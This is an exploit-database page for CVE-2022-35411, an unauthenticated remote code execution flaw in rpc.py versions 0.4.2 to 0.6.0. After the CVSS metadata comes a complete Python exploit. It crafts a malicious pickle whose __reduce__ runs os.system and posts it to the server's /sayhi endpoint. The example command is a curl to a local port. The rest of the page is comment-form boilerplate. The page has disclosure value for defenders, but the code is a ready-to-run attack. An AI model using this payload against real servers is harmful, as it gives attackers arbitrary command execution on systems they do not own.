rpc.py 0.6.0 Remote Code Execution

2022.08.02

Credit: Elias Hohl

Risk: High

Local: No

Remote: Yes

CVE: CVE-2022-35411

CWE: NVD-CWE-noinfo

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 2022-07-12
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/abersheeran
# Software Link: https://github.com/abersheeran/rpc.py
# Version: v0.4.2 - v0.6.0
# Tested on: Debian 11, Ubuntu 20.04
# CVE : CVE-2022-35411

import requests
import pickle

# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py

HOST =3D "127.0.0.1:65432"

URL =3D f"http://{HOST}/sayhi"

HEADERS =3D {
    "serializer": "pickle"
}


def generate_payload(cmd):

    class PickleRce(object):
        def __reduce__(self):
            import os
            return os.system, (cmd,)

    payload =3D pickle.dumps(PickleRce())

    print(payload)

    return payload


def exec_command(cmd):

    payload =3D generate_payload(cmd)

    requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS)


def main():
    exec_command('curl http://127.0.0.1:4321')
    # exec_command('uname -a')


if __name__ =3D=3D "__main__":
    main()
            

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

rpc.py 0.6.0 Remote Code Execution

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.